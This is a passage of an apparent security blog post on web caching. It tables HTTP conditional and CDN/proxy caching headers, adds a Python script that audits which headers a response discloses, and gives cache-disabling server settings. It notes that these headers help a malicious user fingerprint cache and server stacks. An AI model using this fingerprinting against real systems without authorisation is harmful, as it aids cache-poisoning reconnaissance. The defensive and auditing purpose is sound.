font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">If-None-Match</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; 
font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">entity-tag</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">If-Modified-Since</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">HTTP-date timestamp</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: 
none; vertical-align: baseline; white-space: pre;">If-Unmodified-Since</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">HTTP-date timestamp</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">If-Range</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">entity-tag / HTTP-date timestamp</span></p><p dir="ltr" 
style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">(https://tools.ietf.org/html/rfc7233#section-3.2)</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">ETag</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">entity-tag</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">weak</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span 
style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">opaque-tag</span></p>
<p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">etagc</span></p></td></tr></tbody></table></div><p><br /></p><p>In <a href="https://docs.fastly.com/en/guides/understanding-cache-hit-and-miss-headers-with-shielded-services" target="_blank">some</a> <a href="https://cf-cache-status.net/" target="_blank">specific</a> <a href="https://getfishtank.ca/blog/cloudflare-cdn-cf-cache-status-headers-explained" target="_blank">cases</a>, the following<b> custom caching headers</b> can be implemented in the response when a communication relies on a <i>CDN</i> or a<i> reverse proxy server</i>:</p><div align="left" dir="ltr" style="margin-left: 0pt;"><table style="border-collapse: collapse; border: none;"><colgroup><col width="289"></col><col width="261"></col></colgroup><tbody><tr style="height: 21pt;"><td style="background-color: #0b5394; border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: white; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Header</span></p></td><td style="background-color: #0b5394; border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: 
top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: white; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Definition</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">CF-Cache-Status</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">used by CloudFlare CDN in order to provide user the web page caching-state</span></p></td></tr><tr style="height: 23.25pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" 
style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">X-Drupal-Cache</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">used by Drupal CMS in order to provide user the web page caching-state</span></p></td></tr><tr style="height: 23.25pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">X-Cache-Status</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; 
margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">used by NGINX reverse proxy in order to provide user the web page caching-state</span></p><br /></td></tr><tr style="height: 23.25pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">X-Proxy-Cache</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">enables the web-page caching in NGINX reverse proxy</span></p></td></tr><tr style="height: 23.25pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" 
style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">X-Cache</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">general custom header used by CDNs in order to provide user the web page caching-state</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">X-Served-By</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span></p><p dir="ltr" style="line-height: 1.2; 
margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">X-Cache-Hits</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">“X-Served-By” header lists nodes which provide a web page cache copy</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> (i.e. 
“node1-cacheserver, </span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">node2-cacheserver, external-node-cacheserver”);</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">“X-Cache-Hits” specifies which of the listed hosts provides the actual cache </span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">copy (i.e. 
in case of “node2-cacheserver”, </span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">the header would be “0, 1, 0”)</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">X-Cacheable</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">general custom caching header</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" 
style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">X-Cache-Enabled</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">general custom status caching header</span></p></td></tr></tbody></table></div><p><br /></p><p>These headers play an important role in the web cache exploitability context, since they can be used by a malicious user in order to obtain additional information related to the aimed cache/web server and framework in use.</p>
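<p>As an added example (not part of the original post), the following Python snippet turns the table above into a small audit routine: it maps each custom header to the component that emits it, reads the HIT/MISS state and pairs <i>X-Served-By</i> with <i>X-Cache-Hits</i> the way the table describes. The sample response, the <code>LAYER_HINTS</code> mapping and the set of status tokens treated as cache hits are assumptions made for the example.</p>

```python
"""Audit the custom caching headers of one HTTP response.

Added example for this post (not the post's own code): it maps the headers
listed in the table above to the component that emits them, reads the cache
status, and pairs X-Served-By with X-Cache-Hits to name the node that answered.
Useful for an assessment note on what a response discloses about the stack.
"""
from typing import Dict, List, Optional

# Header -> component, following the table above. Lookups are case-insensitive.
LAYER_HINTS = {
    "cf-cache-status": "Cloudflare CDN",
    "x-drupal-cache": "Drupal CMS",
    "x-cache-status": "NGINX reverse proxy",
    "x-proxy-cache": "NGINX reverse proxy",
    "x-cache": "CDN (generic)",
    "x-cacheable": "cache (generic)",
    "x-cache-enabled": "cache (generic)",
    "x-served-by": "cache node list",
}
KNOWN_CACHE_HEADERS = set(LAYER_HINTS) | {"x-cache-hits"}

# Headers whose value carries the HIT/MISS state, checked in this order.
STATUS_HEADERS = ("cf-cache-status", "x-cache-status", "x-proxy-cache", "x-drupal-cache", "x-cache")

# Assumption: these status tokens mean a stored copy was used instead of a fresh origin fetch.
HIT_TOKENS = {"hit", "stale", "revalidated", "updating"}


def served_from_cache(status: Optional[str]) -> Optional[bool]:
    """'HIT', 'HIT from node-3', 'MISS', 'DYNAMIC' -> True/False; None when no status header exists."""
    if status is None:
        return None
    tokens = status.strip().lower().split()
    return bool(tokens) and tokens[0] in HIT_TOKENS


def hit_nodes(served_by: str, cache_hits: str) -> List[str]:
    """Pair the node list with the hit counters; a non-zero counter marks the node that served the copy."""
    nodes = [n.strip() for n in served_by.split(",")]
    hits = [h.strip() for h in cache_hits.split(",")]
    return [n for n, h in zip(nodes, hits) if h.isdigit() and int(h) > 0]


def inspect_cache_headers(headers: Dict[str, str]) -> dict:
    """Summarise what a response's custom caching headers reveal."""
    h = {k.lower(): v for k, v in headers.items()}
    status = next((h[k] for k in STATUS_HEADERS if k in h), None)
    nodes = hit_nodes(h["x-served-by"], h["x-cache-hits"]) if "x-served-by" in h and "x-cache-hits" in h else []
    return {
        "layers": sorted({LAYER_HINTS[k] for k in LAYER_HINTS if k in h}),
        "status": status,
        "served_from_cache": served_from_cache(status),
        "hit_nodes": nodes,
        # Every custom header here is a fingerprinting hint; list them for the report.
        "disclosed_headers": sorted(k for k in h if k in KNOWN_CACHE_HEADERS),
    }


# Constructed sample response, mirroring the X-Served-By / X-Cache-Hits example in the table.
SAMPLE_RESPONSE = {
    "Content-Type": "text/html",
    "Cache-Control": "public, max-age=600",
    "X-Cache": "HIT",
    "X-Served-By": "node1-cacheserver, node2-cacheserver, external-node-cacheserver",
    "X-Cache-Hits": "0, 1, 0",
}

if __name__ == "__main__":
    for key, value in inspect_cache_headers(SAMPLE_RESPONSE).items():
        print(f"{key}: {value}")
```

<p>Feed it the header dictionary of a real response (for instance the one an HTTP client library returns) to list what the stack discloses; each entry in <code>disclosed_headers</code> is a candidate for removal at the edge when clients do not need the information.</p>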
<br />
<h3>A Suitable WebServer Configuration</h3>
<p>As described in the <i>RFC7234</i> <a href="https://tools.ietf.org/html/rfc7234#section-2" target="_blank">section 2</a> and <a href="https://tools.ietf.org/html/rfc7234#section-3" target="_blank">section 3</a>, within a web server configuration, the<b> logical control</b> of the web page “<i>changed-state</i>” is assigned to specific headers inside the request. These headers are also known as “<i><b>cache keys</b></i>”.
<br /><br />
For instance, a “<i>Nginx</i>” web server configured as “<a href="https://docs.nginx.com/nginx/admin-guide/content-cache/content-caching/" target="_blank">Content Caching</a>” uses by default the following cache keys:
</p><ul>
<li><b>headers</b> (i.e. <i>Accept-Language, Host, User-Agent, Accept-Encoding</i>);</li>
<li><b>cookies</b>;</li>
<li><b>resources path</b>;</li>
<li><b>URL query</b>.</li>
</ul>
Once the cache server sees a request whose <i>cache key</i> value differs from the ones it has stored, it treats the response as a brand new web page and serves that copy until it expires. <br /><br />
Beyond <i>cache keys</i>, the basis of a web cache configuration is a suitable <b>web server </b>setup which applies the following <b>basic rules</b> in order to avoid caching <b>custom responses with sensitive information</b> or <i>dynamic documents</i>:
<span id="docs-internal-guid-aeec537a-7fff-6057-a32e-87d051f3e6da"><br /><br /><div align="left" dir="ltr" style="margin-left: 0pt;"><table style="border-collapse: collapse; border: none; table-layout: fixed; width: 451.276pt;"><colgroup><col></col></colgroup><tbody><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"># If you are using the HTTP 1.0 protocol (you are a bad person in this case, you should </span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"># disable it since it has been deprecated!) 
the following instruction enables the </span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"># “Expires: 0” header limits the detention of the cache response to 0 seconds:</span></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">httpResponse.setDateHeader("Expires", 0);</span></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"># If you are using the HTTP 1.0 protocol, the following instruction disables the web </span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"># response caching:</span></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">httpResponse.setHeader("Pragma", "no-cache");</span></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; 
font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"># For further HTTP protocols (v1.1, v1.2 and v1.3), please refer to the following rule</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"># in order to disable the web resource caching:</span></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">httpResponse.setHeader("Cache-Control", "no-cache,must-revalidate");</span></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"># For further HTTP protocols (v1.1, v1.2 and v1.3), if you are using a proxy or a </span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"># reverse-proxy, do not cache the required resource within but relies exclusively on the </span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"># web server version:</span></p><br 
/><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">httpResponse.addHeader("Cache-Control", "proxy-revalidate");</span></p></td></tr></tbody></table></div></span><br />For a fine-tuned configuration, and for a more in-depth analysis of the custom caching headers, you can refer to the following official provider guides:
<ul>
<li><a href="https://www.nginx.com/blog/nginx-caching-guide/" target="_blank">NGINX Caching guide</a>;</li>
<li><a href="https://httpd.apache.org/docs/2.4/caching.html" target="_blank">Apache Caching Guide</a>;</li>
<li>Akamai Caching Guide: <a href="https://developer.akamai.com/blog/2017/03/28/what-you-need-know-about-caching-part-1" target="_blank">Part 1</a>, <a href="https://developer.akamai.com/blog/2017/04/06/what-you-need-know-about-caching-part-2" target="_blank">Part 2</a>, <a href="Part 3" target="_blank">Part 3</a>;</li>
<li><a href="https://support.cloudflare.com/hc/en-us/articles/115003206852-Understanding-Origin-Cache-Control" target="_blank">Cloudflare Caching Guide</a>;</li>
<li><a href="https://docs.fastly.com/en/guides/configuring-caching" target="_blank">Fastly Caching Guide</a>.</li>
</ul>
